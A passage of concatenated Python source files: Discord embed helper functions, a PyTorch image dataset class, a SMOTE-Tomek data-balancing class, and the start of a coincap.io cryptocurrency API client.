footer_icon_url=EmptyEmbed,
timestamp=EmptyEmbed,
):
embed_dict = {}
if author_name or author_url or author_icon_url:
embed_dict["author"] = {}
if author_name:
embed_dict["author"]["name"] = author_name
if author_url:
embed_dict["author"]["url"] = author_url
if author_icon_url:
embed_dict["author"]["icon_url"] = author_icon_url
if footer_text or footer_icon_url:
embed_dict["footer"] = {}
if footer_text:
embed_dict["footer"]["text"] = footer_text
if footer_icon_url:
embed_dict["footer"]["icon_url"] = footer_icon_url
if title:
embed_dict["title"] = title
if url:
embed_dict["url"] = url
if description:
embed_dict["description"] = description
if color != -1:
embed_dict["color"] = (
int(color) if 0 <= color < 0x1000000 else DEFAULT_EMBED_COLOR
)
if timestamp:
if isinstance(timestamp, str):
try:
datetime.datetime.fromisoformat(
timestamp[:-1] if timestamp.endswith("Z") else timestamp
)
embed_dict["timestamp"] = timestamp
except ValueError:
pass
elif isinstance(timestamp, datetime.datetime):
embed_dict["timestamp"] = timestamp.isoformat()
if image_url:
embed_dict["image"] = {"url": image_url}
if thumbnail_url:
embed_dict["thumbnail"] = {"url": thumbnail_url}
if fields:
fields_list = []
embed_dict["fields"] = fields_list
for field in fields:
field_dict = {}
if isinstance(field, dict):
if field.get("name", ""):
field_dict["name"] = field["name"]
if field.get("value", ""):
field_dict["value"] = field["value"]
if field.get("inline", "") in (False, True):
field_dict["inline"] = field["inline"]
elif isinstance(field, (list, tuple)):
name = None
value = None
inline = None
field_len = len(field)
if field_len == 3:
name, value, inline = field
if name:
field_dict["name"] = name
if value:
field_dict["value"] = value
if inline in (False, True):
field_dict["inline"] = inline
if field_dict:
fields_list.append(field_dict)
return embed_dict
def validate_embed_dict(embed_dict: dict):
"""
Checks if an embed dictionary can produce
a viable embed on Discord.
Args:
embed_dict: The target embed dictionary
Returns:
A boolean indicating the validity of the
given input dictionary.
"""
if not embed_dict:
return False
embed_dict_len = len(embed_dict)
for k in tuple(embed_dict.keys()):
if (
embed_dict_len == 1
and (k == "color" or k == "timestamp")
or embed_dict_len == 2
and ("color" in embed_dict and "timestamp" in embed_dict)
):
return False
elif (
not embed_dict[k]
or k == "footer"
and "text" not in embed_dict[k]
or k == "author"
and "name" not in embed_dict[k]
or k in ("thumbnail", "image")
and "url" not in embed_dict[k]
):
return False
elif k == "fields":
for i in range(len(embed_dict["fields"])):
if (
"name" not in embed_dict["fields"][i]
or "value" not in embed_dict["fields"][i]
):
return False
elif k == "color" and not 0 <= embed_dict["color"] <= 0xFFFFFF:
return False
elif k == "timestamp":
try:
datetime.datetime.fromisoformat(embed_dict[k])
except ValueError:
return False
return True
def clean_embed_dict(embed_dict: dict):
for k in tuple(embed_dict.keys()):
if (
not embed_dict[k]
or k == "footer"
and "text" not in embed_dict[k]
or k == "author"
and "name" not in embed_dict[k]
or k in ("thumbnail", "image")
and "url" not in embed_dict[k]
):
del embed_dict[k]
elif k == "fields":
for i in reversed(range(len(embed_dict["fields"]))):
if (
"name" not in embed_dict["fields"][i]
or "value" not in embed_dict["fields"][i]
):
embed_dict["fields"].pop(i)
elif k == "color":
embed_dict["color"] = min(max(0, embed_dict["color"]), 0xFFFFFF)
elif k == "timestamp":
try:
datetime.datetime.fromisoformat(embed_dict[k])
except ValueError:
del embed_dict["timestamp"]
return embed_dict
def create(
author_name=EmptyEmbed,
author_url=EmptyEmbed,
author_icon_url=EmptyEmbed,
title=EmptyEmbed,
url=EmptyEmbed,
thumbnail_url=EmptyEmbed,
description=EmptyEmbed,
image_url=EmptyEmbed,
color=0xFFFFAA,
fields=(),
footer_text=EmptyEmbed,
footer_icon_url=EmptyEmbed,
timestamp=EmptyEmbed,
):
"""
Creates an embed with a much more tight function.
"""
embed = discord.Embed(
title=title,
url=url,
description=description,
color=color if 0 <= color < 0x1000000 else DEFAULT_EMBED_COLOR,
)
if timestamp:
if isinstance(timestamp, str):
try:
embed.timestamp = datetime.datetime.fromisoformat(
timestamp[:-1] if timestamp.endswith("Z") else timestamp
)
except ValueError:
pass
elif isinstance(timestamp, datetime.datetime):
embed.timestamp = timestamp
if author_name:
embed.set_author(name=author_name, url=author_url, icon_url=author_icon_url)
if thumbnail_url:
embed.set_thumbnail(url=thumbnail_url)
if image_url:
embed.set_image(url=image_url)
for field in fields:
if isinstance(field, dict):
embed.add_field(
name=field.get("name", ""),
value=field.get("value", ""),
inline=field.get("inline", True),
)
else:
embed.add_field(name=field[0], value=field[1], inline=field[2])
if footer_text:
embed.set_footer(text=footer_text, icon_url=footer_icon_url)
return embed
async def send(
channel: common.Channel,
author_name=EmptyEmbed,
author_url=EmptyEmbed,
author_icon_url=EmptyEmbed,
title=EmptyEmbed,
url=EmptyEmbed,
thumbnail_url=EmptyEmbed,
description=EmptyEmbed,
image_url=EmptyEmbed,
color=0xFFFFAA,
fields=[],
footer_text=EmptyEmbed,
footer_icon_url=EmptyEmbed,
timestamp=EmptyEmbed,
):
"""
Sends an embed with a much more tight function. If the channel is
None it will return the embed instead of sending it.
"""
embed = create(
author_name=author_name,
author_url=author_url,
author_icon_url=author_icon_url,
title=title,
url=url,
thumbnail_url=thumbnail_url,
description=description,
image_url=image_url,
color=color,
fields=fields,
footer_text=footer_text,
footer_icon_url=footer_icon_url,
timestamp=timestamp,
)
return await channel.send(embed=embed)
async def replace(
message: discord.Message,
author_name=EmptyEmbed,
author_url=EmptyEmbed,
author_icon_url=EmptyEmbed,
title=EmptyEmbed,
url=EmptyEmbed,
thumbnail_url=EmptyEmbed,
description=EmptyEmbed,
image_url=EmptyEmbed,
color=0xFFFFAA,
fields=[],
footer_text=EmptyEmbed,
footer_icon_url=EmptyEmbed,
timestamp=EmptyEmbed,
):
"""
Replaces the embed of a message with a much more tight function
"""
embed = create(
author_name=author_name,
author_url=author_url,
author_icon_url=author_icon_url,
title=title,
url=url,
thumbnail_url=thumbnail_url,
description=description,
image_url=image_url,
color=color,
fields=fields,
footer_text=footer_text,
footer_icon_url=footer_icon_url,
timestamp=timestamp,
)
return await message.edit(embed=embed)
async def edit(
message: discord.Message,
embed: discord.Embed,
author_name=EmptyEmbed,
author_url=EmptyEmbed,
author_icon_url=EmptyEmbed,
title=EmptyEmbed,
url=EmptyEmbed,
thumbnail_url=EmptyEmbed,
description=EmptyEmbed,
image_url=EmptyEmbed,
color=-1,
fields=[],
footer_text=EmptyEmbed,
footer_icon_url=EmptyEmbed,
timestamp=EmptyEmbed,
add_attributes=False,
inner_fields: bool = False,
):
"""
Updates the changed attributes of the embed of a message with a
much more tight function
"""
old_embed_dict = embed.to_dict()
update_embed_dict = create_as_dict(
author_name=author_name,
author_url=author_url,
author_icon_url=author_icon_url,
title=title,
url=url,
thumbnail_url=thumbnail_url,
description=description,
image_url=image_url,
color=color,
fields=fields,
footer_text=footer_text,
footer_icon_url=footer_icon_url,
timestamp=timestamp,
)
if inner_fields:
if "fields" in old_embed_dict:
old_embed_dict["fields"] = {
str(i): old_embed_dict["fields"][i]
for i in range(len(old_embed_dict["fields"]))
}
if "fields" in update_embed_dict:
update_embed_dict["fields"] = {
str(i): update_embed_dict["fields"][i]
for i in range(len(update_embed_dict["fields"]))
}
recursive_update(
old_embed_dict, update_embed_dict, add_new_keys=add_attributes, skip_value=""
)
if inner_fields:
if "fields" in old_embed_dict:
old_embed_dict["fields"] = [
old_embed_dict["fields"][i]
for i in sorted(old_embed_dict["fields"].keys())
]
if "fields" in update_embed_dict:
update_embed_dict["fields"] = [
update_embed_dict["fields"][i]
for i in sorted(update_embed_dict["fields"].keys())
]
if message is None:
return discord.Embed.from_dict(old_embed_dict)
return await message.edit(embed=discord.Embed.from_dict(old_embed_dict))
def create_from_dict(data):
"""
Creates an embed from a dictionary with a much more tight function
"""
data = handle_embed_dict_timestamp(data)
return discord.Embed.from_dict(data)
async def send_from_dict(channel: common.Channel, data):
"""
Sends an embed from a dictionary with a much more tight function
"""
return await channel.send(embed=create_from_dict(data))
async def replace_from_dict(message: discord.Message, data):
"""
Replaces the embed of a message from a dictionary with a much more
tight function
"""
handle_embed_dict_timestamp(data)
return await message.edit(embed=create_from_dict(data))
async def edit_from_dict(
message: discord.Message,
embed: discord.Embed,
update_embed_dict: dict,
add_attributes: bool = True,
inner_fields: bool = False,
):
"""
Edits the changed attributes of the embed of a message from a
dictionary with a much more tight function
"""
old_embed_dict = embed.to_dict()
if inner_fields:
if "fields" in old_embed_dict:
old_embed_dict["fields"] = {
str(i): old_embed_dict["fields"][i]
for i in range(len(old_embed_dict["fields"]))
}
if "fields" in update_embed_dict:
update_embed_dict["fields"] = {
str(i): update_embed_dict["fields"][i]
for i in range(len(update_embed_dict["fields"]))
}
recursive_update(
old_embed_dict, update_embed_dict, add_new_keys=add_attributes, skip_value=""
)
if inner_fields:
if "fields" in old_embed_dict:
old_embed_dict["fields"] = [
old_embed_dict["fields"][i]
for i in sorted(old_embed_dict["fields"].keys())
]
if "fields" in update_embed_dict:
update_embed_dict["fields"] = [
update_embed_dict["fields"][i]
for i in sorted(update_embed_dict["fields"].keys())
]
old_embed_dict = handle_embed_dict_timestamp(old_embed_dict)
return await message.edit(embed=discord.Embed.from_dict(old_embed_dict))
def edit_dict_from_dict(
old_embed_dict: dict,
update_embed_dict: dict,
add_attributes: bool = True,
inner_fields: bool = False,
):
"""
Edits the changed attributes of an embed dictionary using another
dictionary
"""
if inner_fields:
if "fields" in old_embed_dict:
old_embed_dict["fields"] = {
str(i): old_embed_dict["fields"][i]
for i in range(len(old_embed_dict["fields"]))
}
if "fields" in update_embed_dict:
update_embed_dict["fields"] = {
str(i): update_embed_dict["fields"][i]
for i in range(len(update_embed_dict["fields"]))
}
recursive_update(
old_embed_dict, update_embed_dict, add_new_keys=add_attributes, skip_value=""
)
if inner_fields:
if "fields" in old_embed_dict:
old_embed_dict["fields"] = [
old_embed_dict["fields"][i]
for i in sorted(old_embed_dict["fields"].keys())
]
if "fields" in update_embed_dict:
update_embed_dict["fields"] = [
update_embed_dict["fields"][i]
for i in sorted(update_embed_dict["fields"].keys())
]
old_embed_dict = handle_embed_dict_timestamp(old_embed_dict)
return old_embed_dict
async def replace_field_from_dict(
message: discord.Message, embed: discord.Embed, field_dict: dict, index: int
):
"""
Replaces an embed field of the embed of a message from a dictionary
"""
fields_count = len(embed.fields)
index = fields_count + index if index < 0 else index
embed.set_field_at(
index,
name=field_dict.get("name", ""),
value=field_dict.get("value", ""),
inline=field_dict.get("inline", True),
)
return await message.edit(embed=embed)
async def edit_field_from_dict(
message: discord.Message, embed: discord.Embed, field_dict: dict, index: int
):
"""
Edits parts of an embed field of the embed of a message from a
dictionary
"""
fields_count = len(embed.fields)
index = fields_count + index if index < 0 else index
embed_dict = embed.to_dict()
old_field_dict = embed_dict["fields"][index]
for k in field_dict:
if k in old_field_dict and field_dict[k] != "":
old_field_dict[k] = field_dict[k]
embed.set_field_at(
index,
name=old_field_dict.get("name", ""),
value=old_field_dict.get("value", ""),
inline=old_field_dict.get("inline", True),
)
return await message.edit(embed=embed)
async def edit_fields_from_dicts(
message: discord.Message, embed: discord.Embed, field_dicts: list[dict]
):
"""
Edits embed fields in the embed of a message from dictionaries
"""
embed_dict = embed.to_dict()
old_field_dicts = embed_dict.get("fields", [])
old_field_dicts_len = len(old_field_dicts)
field_dicts_len = len(field_dicts)
for i in range(old_field_dicts_len):
if i > field_dicts_len - 1:
break
old_field_dict = old_field_dicts[i]
field_dict = field_dicts[i]
if field_dict:
for k in field_dict:
if k in old_field_dict and field_dict[k] != "":
old_field_dict[k] = field_dict[k]
embed.set_field_at(
i,
name=old_field_dict.get("name", ""),
value=old_field_dict.get("value", ""),
inline=old_field_dict.get("inline", True),
)
return await message.edit(embed=embed)
async def add_field_from_dict(
message: discord.Message, embed: discord.Embed, field_dict: dict
):
"""
Adds an embed field to the embed of a message from a dictionary
"""
embed.add_field(
name=field_dict.get("name", ""),
value=field_dict.get("value", ""),
inline=field_dict.get("inline", True),
)
return await message.edit(embed=embed)
async def add_fields_from_dicts(
message: discord.Message, embed: discord.Embed, field_dicts: list[dict]
):
"""
Adds embed fields to the embed of a message from dictionaries
"""
for field_dict in field_dicts:
embed.add_field(
name=field_dict.get("name", ""),
value=field_dict.get("value", ""),
inline=field_dict.get("inline", True),
)
return await message.edit(embed=embed)
async def insert_field_from_dict(
message: discord.Message, embed: discord.Embed, field_dict: dict, index: int
):
"""
Inserts an embed field of the embed of a message from a
"""
fields_count = len(embed.fields)
index = fields_count + index if index < 0 else index
embed.insert_field_at(
index,
name=field_dict.get("name", ""),
value=field_dict.get("value", ""),
inline=field_dict.get("inline", True),
)
return await message.edit(embed=embed)
async def insert_fields_from_dicts(
message: discord.Message, embed: discord.Embed, field_dicts: list[dict], index: int
):
"""
Inserts embed fields to the embed of a message from dictionaries
at a specified index
"""
fields_count = len(embed.fields)
index = fields_count + index if index < 0 else index
for field_dict in field_dicts:
embed.insert_field_at(
index,
name=field_dict.get("name", ""),
value=field_dict.get("value", ""),
inline=field_dict.get("inline", True),
)
return await message.edit(embed=embed)
async def remove_fields(
message: discord.Message, embed: discord.Embed, field_indices: list
):
"""
Removes multiple embed fields of the embed of a message from a
dictionary
"""
fields_count = len(embed.fields)
parsed_field_indices = [
fields_count + idx if idx < 0 else idx for idx in field_indices
]
parsed_field_indices.sort(reverse=True)
for index in parsed_field_indices:
embed.remove_field(index)
return await message.edit(embed=embed)
async def swap_fields(
message: discord.Message, embed: discord.Embed, index_a: int, index_b: int
):
"""
Swaps two embed fields of the embed of a message from a
dictionary
"""
fields_count = len(embed.fields)
index_a = fields_count + index_a if index_a < 0 else index_a
index_b = fields_count + index_b if index_b < 0 else index_b
embed_dict = embed.to_dict()
fields_list = embed_dict["fields"]
fields_list[index_a], fields_list[index_b] = (
fields_list[index_b],
fields_list[index_a],
)
return await message.edit(embed=discord.Embed.from_dict(embed_dict))
async def clone_field(message: discord.Message, embed: discord.Embed, index: int):
"""
Duplicates an embed field of the embed of a message from a
dictionary
"""
fields_count = len(embed.fields)
index = fields_count + index if index < 0 else index
embed_dict = embed.to_dict()
cloned_field = embed_dict["fields"][index].copy()
embed_dict["fields"].insert(index, cloned_field)
return await message.edit(embed=discord.Embed.from_dict(embed_dict))
async def clone_fields(
message: discord.Message,
embed: discord.Embed,
field_indices: list,
insertion_index: Optional[int] = None,
):
"""
Duplicates multiple embed fields of the embed of a message
from a dictionary
"""
fields_count = len(embed.fields)
parsed_field_indices = [
fields_count + idx if idx < 0 else idx for idx in field_indices
]
parsed_field_indices.sort(reverse=True)
embed_dict = embed.to_dict()
if isinstance(insertion_index, int):
insertion_index = (
fields_count + insertion_index if insertion_index < 0 else insertion_index
)
cloned_fields = tuple(
embed_dict["fields"][index].copy()
for index in sorted(field_indices, reverse=True)
)
for cloned_field in cloned_fields:
embed_dict["fields"].insert(insertion_index, cloned_field)
else:
for index in parsed_field_indices:
cloned_field = embed_dict["fields"][index].copy()
embed_dict["fields"].insert(index, cloned_field)
return await message.edit(embed=discord.Embed.from_dict(embed_dict))
async def clear_fields(
message: discord.Message,
embed: discord.Embed,
):
"""
Removes all embed fields of the embed of a message from a
dictionary
"""
embed.clear_fields()
return await message.edit(embed=embed)
def import_embed_data(
source: Union[str, io.StringIO],
from_string=False,
from_json=False,
from_json_string=False,
as_string=False,
as_dict=True,
):
"""
Import embed data from a file or a string containing JSON
or a Python dictionary and return it as a Python dictionary or string.
"""
if from_json or from_json_string:
if from_json_string:
json_data = json.loads(source)
if not isinstance(json_data, dict) and as_dict:
raise TypeError(
"The given string must contain a JSON object that"
" can be converted into a Python `dict` object"
)
if as_string:
json_data = json.dumps(json_data)
return json_data
else:
json_data = json.load(source)
if not isinstance(json_data, dict) and as_dict:
raise TypeError(
f"the file at '{source}' must contain a JSON object that"
" can be converted into a Python `dict` object"
)
if as_string:
json_data = json.dumps(json_data)
return json_data
elif from_string:
try:
data = literal_eval(source)
except Exception as e:
raise TypeError(
"The contents of the given object must be parsable into literal Python "
"strings, bytes, numbers, tuples, lists, dicts, sets, booleans, and "
"None."
).with_traceback(e)
if not isinstance(data, dict) and as_dict:
raise TypeError(
f"the file at '{source}' must be of type dict" f", not '{type(data)}'"
)
if as_string:
return repr(data)
return data
else:
data = None
if isinstance(source, io.StringIO):
if as_string:
data = source.getvalue()
else:
try:
data = literal_eval(source.getvalue())
except Exception as e:
raise TypeError(
f", not '{type(data)}'"
f"the content of the file at '{source}' must be parsable into a"
"literal Python strings, bytes, numbers, tuples, lists, dicts, sets, booleans, and None."
).with_traceback(e)
if not isinstance(data, dict) and as_dict:
raise TypeError(
f"the file at '{source}' must be of type dict"
f", not '{type(data)}'"
)
else:
with open(source, "r", encoding="utf-8") as d:
if as_string:
data = d.read()
else:
try:
data = literal_eval(d.read())
except Exception as e:
raise TypeError(
f", not '{type(data)}'"
f"the content of the file at '{source}' must be parsable into a"
"literal Python strings, bytes, numbers, tuples, lists, dicts, sets, booleans, and None."
).with_traceback(e)
if not isinstance(data, dict) and as_dict:
raise TypeError(
f"the file at '{source}' must be of type dict"
f", not '{type(data)}'"
)
return data
def export_embed_data(
data: Union[dict, tuple, list],
fp: Union[str, io.StringIO] = None,
indent=None,
as_json=True,
always_return=False,
):
"""
Export embed data to serialized JSON or a Python dictionary and store it in a file or a string.
"""
if as_json:
return_data = None
if isinstance(fp, str):
with open(fp, "w", encoding="utf-8") as fobj:
json.dump(data, fobj, indent=indent)
if always_return:
return_data = json.dumps(data, indent=indent)
elif isinstance(fp, io.StringIO):
json.dump(data, fp, indent=indent)
if always_return:
return_data = fp.getvalue()
else:
return_data = json.dumps(data, indent=indent)
return return_data
else:
return_data = None
if isinstance(fp, str):
with open(fp, "w", encoding="utf-8") as fobj:
if always_return:
return_data = black.format_str(
repr(data),
mode=black.FileMode(),
)
fobj.write(return_data)
else:
fobj.write(
black.format_str(
repr(data),
mode=black.FileMode(),
)
)
elif isinstance(fp, io.StringIO):
if always_return:
return_data = black.format_str(
repr(data),
mode=black.FileMode(),
)
fp.write(return_data)
fp.seek(0)
else:
fp.write(
black.format_str(
repr(data),
mode=black.FileMode(),
)
)
fp.seek(0)
else:
return_data = repr(data)
return return_data
def get_member_info_str(member: Union[discord.Member, discord.User]):
"""
Get member info in a string, utility function for the embed functions
"""
datetime_format_str = "`%a, %d %b %Y`\n> `%H:%M:%S (UTC) `"
member_name_info = f"\u200b\n*Name*: \n> {member.mention} \n> "
if hasattr(member, "nick") and member.display_name:
member_nick = (
member.display_name.replace("\\", r"\\")
.replace("*", r"\*")
.replace("`", r"\`")
.replace("_", r"\_")
)
member_name_info += (
f"**{member_nick}**\n> (*{member.name}#{member.discriminator}*)\n\n"
)
else:
member_name_info += f"**{member.name}**#{member.discriminator}\n\n"
member_created_at_fdtime = member.created_at.astimezone(
tz=datetime.timezone.utc
).strftime(datetime_format_str)
member_created_at_info = (
f"*Created On*:\n`{member.created_at.isoformat()}`\n"
+ f"> {member_created_at_fdtime}\n\n"
)
if isinstance(member, discord.Member) and member.joined_at:
member_joined_at_fdtime = member.joined_at.astimezone(
tz=datetime.timezone.utc
).strftime(datetime_format_str)
member_joined_at_info = (
f"*Joined On*:\n`{member.joined_at.isoformat()}`\n"
+ f"> {member_joined_at_fdtime}\n\n"
)
else:
member_joined_at_info = "*Joined On*: \n> `...`\n\n"
divider_roles = {} if common.GENERIC else common.ServerConstants.DIVIDER_ROLES
member_func_role_count = (
max(
len(
tuple(
member.roles[i]
for i in range(1, len(member.roles))
if member.roles[i].id not in divider_roles
)
),
0,
)
if isinstance(member, discord.Member)
else ""
)
if isinstance(member, discord.Member) and member_func_role_count:
member_top_role_info = f"*Highest Role*: \n> {member.roles[-1].mention}\n> `<@&{member.roles[-1].id}>`\n\n"
if member_func_role_count != len(member.roles) - 1:
member_role_count_info = f"*Role Count*: \n> `{member_func_role_count} ({len(member.roles) - 1})`\n\n"
else:
member_role_count_info = f"*Role Count*: \n> `{member_func_role_count}`\n\n"
else:
member_top_role_info = member_role_count_info = ""
member_id_info = f"*Member ID*: \n> <@!`{member.id}`>\n\n"
if isinstance(member, discord.Member):
member_stats = (
f"*Is Pending Screening*: \n> `{member.pending}`\n\n"
f"*Is Bot Account*: \n> `{member.bot}`\n\n"
f"*Is System User (Discord Official)*: \n> `{member.system}`\n\n"
)
else:
member_stats = (
f"*Is Bot Account*: \n> `{member.bot}`\n\n"
f"*Is System User (Discord Official)*: \n> `{member.system}`\n\n"
)
return "".join(
(
member_name_info,
member_created_at_info,
member_joined_at_info,
member_top_role_info,
member_role_count_info,
member_id_info,
member_stats,
)
)
def get_msg_info_embed(msg: discord.Message, author: bool = True):
"""
Generate an embed containing info about a message and its author.
"""
member: Union[discord.Member, discord.User] = msg.author
datetime_format_str = "`%a, %d %b %Y`\n> `%H:%M:%S (UTC) `"
msg_created_at_fdtime = msg.created_at.astimezone(
tz=datetime.timezone.utc
).strftime(datetime_format_str)
msg_created_at_info = (
"\u200b\n"
if author
else ""
+ f"*Created On:*\n`{msg.created_at.isoformat()}`\n"
+ f"> {msg_created_at_fdtime}\n\n"
)
if msg.edited_at:
msg_edited_at_fdtime = msg.edited_at.astimezone(
tz=datetime.timezone.utc
).strftime(datetime_format_str)
msg_edited_at_info = (
f"*Last Edited On*:\n`{msg.edited_at.isoformat()}`\n"
+ f"> {msg_edited_at_fdtime}\n\n"
)
else:
msg_edited_at_info = "*Last Edited On*: \n> `...`\n\n"
msg_id_info = f"*Message ID*: \n> `{msg.id}`\n\n"
msg_char_count_info = f"*Char. Count*: \n> `{len(msg.content) if isinstance(msg.content, str) else 0}`\n\n"
msg_attachment_info = (
f"*Number Of Attachments*: \n> `{len(msg.attachments)} attachment(s)`\n\n"
)
msg_embed_info = f"*Number Of Embeds*: \n> `{len(msg.embeds)} embed(s)`\n\n"
msg_is_pinned = f"*Is Pinned*: \n> `{msg.pinned}`\n\n"
msg_info = "".join(
(
msg_created_at_info,
msg_edited_at_info,
msg_char_count_info,
msg_id_info,
msg_embed_info,
msg_attachment_info,
msg_is_pinned,
)
)
if author:
return create(
title="__Message & Author Info__",
description="".join(
(
"__Text"
+ (" (Shortened)" if len(msg.content) > 2000 else "")
+ "__:",
f"\n\n {msg.content[:2001]}" + "\n\n[...]\n\u2800"
if len(msg.content) > 2000
else "\n\u2800",
)
),
thumbnail_url=str(member.avatar_url),
fields=[
("__Message Info__", msg_info, True),
("__Message Author Info__", get_member_info_str(member), True),
("\u2800", f"**[View Original Message]({msg.jump_url})**", False),
],
)
member_name_info = f"\u200b\n*Name*: \n> {member.mention} \n> "
if isinstance(member, discord.Member) and member.nick:
member_nick = (
member.nick.replace("\\", r"\\")
.replace("*", r"\*")
.replace("`", r"\`")
.replace("_", r"\_")
)
member_name_info += (
f"**{member_nick}**\n> (*{member.name}#{member.discriminator}*)\n\n"
)
else:
member_name_info += f"**{member.name}**#{member.discriminator}\n\n"
return create(
title="__Message Info__",
author_name=f"{member.name}#{member.discriminator}",
author_icon_url=str(member.avatar_url),
description="".join(
(
"__Text" + (" (Shortened)" if len(msg.content) > 2000 else "") + "__:",
f"\n\n {msg.content[:2001]}" + "\n\n[...]\n\u2800"
if len(msg.content) > 2000
else "\n\u2800",
)
),
fields=[
(
"__" + ("Message " if author else "") + "Info__",
member_name_info + msg_info,
True,
),
("\u2800", f"**[View Original Message]({msg.jump_url})**", False),
],
)
def get_member_info_embed(member: Union[discord.Member, discord.User]):
"""
Generate an embed containing info about a server member.
"""
return create(
title="__"
+ ("Member" if isinstance(member, discord.Member) else "User")
+ " Info__",
description=get_member_info_str(member),
thumbnail_url=str(member.avatar_url),
)
|
from torch.utils import data
import torch
from PIL import Image
class HAM_dataset(data.Dataset):
'Characterizes a dataset for PyTorch'
def __init__(self, df, transform=None):
'Initialization'
self.df = df
self.transform = transform
def __len__(self):
'Denotes the total number of samples'
return len(self.df)
def __getitem__(self, index):
'Generates one sample of data'
# Load data and get label
X = Image.open(self.df['path'][index])
y = torch.tensor(int(self.df['cell_type_idx'][index]))
if self.transform:
X = self.transform(X)
return X, y
|
'''
Created with love by Sigmoid
@Author - Stojoc Vladimir - vladimir.stojoc@gmail.com
'''
import numpy as np
import pandas as pd
import random
import sys
from random import randrange
from .erorrs import NotBinaryData, NoSuchColumn
def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
class SMOTETOMEK:
def __init__(self,k: "int > 0" = 5, seed: float = 42, binary_columns : list = None) -> None:
'''
Setting up the algorithm
:param k: int, k>0, default = 5
Number of neighbours which will be considered when looking for simmilar data points
:param seed: intt, default = 42
seed for random
:param binary_columns: list, default = None
The list of columns that should have binary values after balancing.
'''
self.__k = k
if binary_columns is None:
self.__binarize = False
else:
self.__binarize = True
self.__binary_columns = binary_columns
self.__seed = seed
np.random.seed(self.__seed)
random.seed(self.__seed)
def __to_binary(self) -> None:
'''
If the :param binary_columns: is set to True then the intermediate values in binary columns will be rounded.
'''
for column_name in self.__binary_columns:
serie = self.synthetic_df[column_name].values
threshold = (self.df[column_name].max() + self.df[column_name].min()) / 2
for i in range(len(serie)):
if serie[i] >= threshold:
serie[i] = self.df[column_name].max()
else:
serie[i] = self.df[column_name].min()
self.synthetic_df[column_name] = serie
def __infinity_check(self, matrix : 'np.array') -> 'np.array':
'''
This function replaces the infinity and -infinity values with the minimal and maximal float python values.
:param matrix: 'np.array'
The numpy array that was generated my the algorithm.
:return: 'np.array'
The numpy array with the infinity replaced values.
'''
matrix[matrix == -np.inf] = sys.float_info.min
matrix[matrix == np.inf] = sys.float_info.max
return matrix
def __undersample(self):
'''
Undersample the dataset using Tomek links algorithm
'''
distances = []
minority_nearest = []
majority_nearest = []
#save distances for minority class
for example in self.minority_samples:
distances = []
for x in self.majority_samples:
distances.append(np.linalg.norm(x - example, ord=2))
predicted_index = np.argsort(distances)[0]
minority_nearest.append(predicted_index)
#save distances for majority class
for example in self.majority_samples:
distances = []
for x in self.minority_samples:
distances.append(np.linalg.norm(x - example, ord=2))
predicted_index = np.argsort(distances)[0]
majority_nearest.append(predicted_index)
#find all tomek links
to_delete = []
for i in range(len(minority_nearest)):
if i == majority_nearest[minority_nearest[i]]:
to_delete.append(minority_nearest[i])
#delete all Tomek links
self.majority_samples = np.delete(self.majority_samples,to_delete,axis = 0)
# Creating new dataset without Tomek Links
mj = pd.DataFrame(self.majority_samples,columns = self.X_columns)
mj.loc[:, self.target] = self.majority_class
mn = pd.DataFrame(self.minority_samples,columns = self.X_columns)
mn.loc[:, self.target] = self.minority_class
self.df = pd.concat([mj,mn],axis = 0)
def balance(self, df : pd.DataFrame, target : str)-> pd.DataFrame:
'''
Reducing the dimensionality of the data
:param df: pandas DataFrame
Data Frame on which the algorithm is applied
:param y_column: string
The target name of the value that we have to predict
'''
#check for binary
unique = df[target].unique()
if len(unique)!=2:
raise NotBinaryData(f"{target} column isn't a binary column")
if target not in df.columns:
raise NoSuchColumn(f"{target} isn't a column of passed data frame")
self.target= target
self.df = df.copy()
self.X_columns = [column for column in self.df.columns if column != target]
#check the minority class
first_class = len(df[df[target]==unique[0]])/len(df[target])
if first_class > 0.5:
self.minority_class,self.majority_class = unique[1],unique[0]
else:
self.minority_class,self.majority_class = unique[0],unique[1]
majority = df[df[target]==self.majority_class]
minority = df[df[target]==self.minority_class]
self.minority_samples = self.df[self.df[target] == self.minority_class][self.X_columns].values
self.majority_samples = self.df[self.df[target] == self.majority_class][self.X_columns].values
#calling undersample function
self.__undersample()
#find difference
difference = len(majority)-len(minority)
self.synthetic_data = []
for _ in range(difference):
#random example from minority class
index = randrange(len(self.minority_samples))
example = self.minority_samples[index]
#select k neighbouors from this example
neighbours_indexes = self.__get_k_neighbours(example)
#select random neighbour
index = randrange(len(neighbours_indexes))
selected_neighbour = neighbours_indexes[index]
selected_neighbour = self.minority_samples[selected_neighbour]
#select random point between example and neighbour
alpha = random.random()
new_example = example+alpha*(selected_neighbour-example)
#add it to df
self.synthetic_data.append(new_example)
self.synthetic_data = self.__infinity_check(np.array(self.synthetic_data))
self.synthetic_df = pd.DataFrame(np.array(self.synthetic_data), columns=self.X_columns)
self.synthetic_df.loc[:, target] = self.minority_class
self.synthetic_df = pd.concat([self.synthetic_df,self.df],axis=0)
# Rounding binary columns if needed.
if self.__binarize:
self.__to_binary()
#return new df
return self.synthetic_df
def __get_k_neighbours(self,example):
'''
KNN, getting nearest neighbors
:param example: Numpy array
the sample row from minority class to get neighbours from
:param minority_samples: Numpy.ndarray
minority class samples from where we find neighbours
'''
distances = []
for x in self.minority_samples:
distances.append(np.linalg.norm(x - example, ord=2))
predicted_index = np.argsort(distances)[1:self.__k + 1]
return predicted_index |
import time
from datetime import datetime
from typing import List, Dict, Tuple
import pandas as pd
import requests
from mpt import Asset
"""
The complete documentation for the coincap.io REST API can be found at https://docs.coincap.io/.
"""
def request_and_jsonize_calm(url, params=None):
repeats = 0
while True:
response = requests.get(url, params=params)
if response.status_code == 200:
return response.json()
if response.status_code == 429:
repeats += 1
sleep_secs = 5 * repeats
time.sleep(sleep_secs)
print(f'Sleeping {sleep_secs} seconds on url: {url}')
continue
if repeats >= 3:
raise Exception(f'Retried too many times: stuck on url {url}')
response.raise_for_status()
def get_available_assets(limit: int = 100) -> List:
""" Get the first most capitalized assets from the coincap.io API. """
js = request_and_jsonize_calm(f"https://api.coincap.io/v2/assets", params={'limit': str(limit)})
assets = []
for asset in js['data']:
assets.append(
{
'id': asset['id'],
'symbol': asset['symbol'],
'name': asset['name']
}
)
return assets
def filter_by_symbol(assets: List[Dict], symbols: List) -> List:
""" Filter the wanted assets, returning a list of assets ordered in the same was as the symbols list.
If one asset is not available, throw an exception.
"""
filtered_assets = []
found = False
for symbol in symbols:
for asset in assets:
if asset['symbol'].lower() == symbol.lower():
filtered_assets.append(asset)
found = True
break
if not found:
